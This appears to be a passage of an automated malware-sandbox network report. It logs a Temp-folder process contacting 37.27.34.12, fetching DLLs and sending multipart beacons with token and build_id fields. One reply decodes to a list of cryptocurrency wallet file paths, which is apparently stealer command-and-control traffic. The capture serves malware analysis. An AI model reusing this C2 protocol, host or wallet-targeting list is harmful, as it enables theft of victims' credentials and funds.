                                                            2024-05-27 13:24:39 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                            Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                            2024-05-27 13:24:39 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                            Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                            2024-05-27 13:24:39 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                            Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                            2024-05-27 13:24:39 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                            Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                            2024-05-27 13:24:39 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                            Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                            2024-05-27 13:24:39 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                            Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                            2024-05-27 13:24:39 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                            Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.85310737.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:40 UTC176OUTGET /vcruntime140.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:41 UTC245INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:40 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 80880
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-13bf0"
                                                            Accept-Ranges: bytes
                                                            2024-05-27 13:24:41 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                            2024-05-27 13:24:41 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                            Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                            2024-05-27 13:24:41 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                            Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                            2024-05-27 13:24:41 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                            Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                            2024-05-27 13:24:41 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                            Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.85310837.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:42 UTC277OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGII
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 1081
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:42 UTC1081OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HIDAFHDHCBGDGCBGCGIICont
                                                            2024-05-27 13:24:43 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.85310937.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:46 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJ
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CBGCBGCAFIIECBFIDHIJCont
                                                            2024-05-27 13:24:46 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:46 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                            Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.85311037.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:47 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIE
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IJEHIDHDAKJDHJKEBFIECont
                                                            2024-05-27 13:24:48 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.85311137.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:49 UTC276OUTPOST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFI
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:49 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------FCBAEHCAEGDHJKFHJKFICont
                                                            2024-05-27 13:24:49 UTC158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
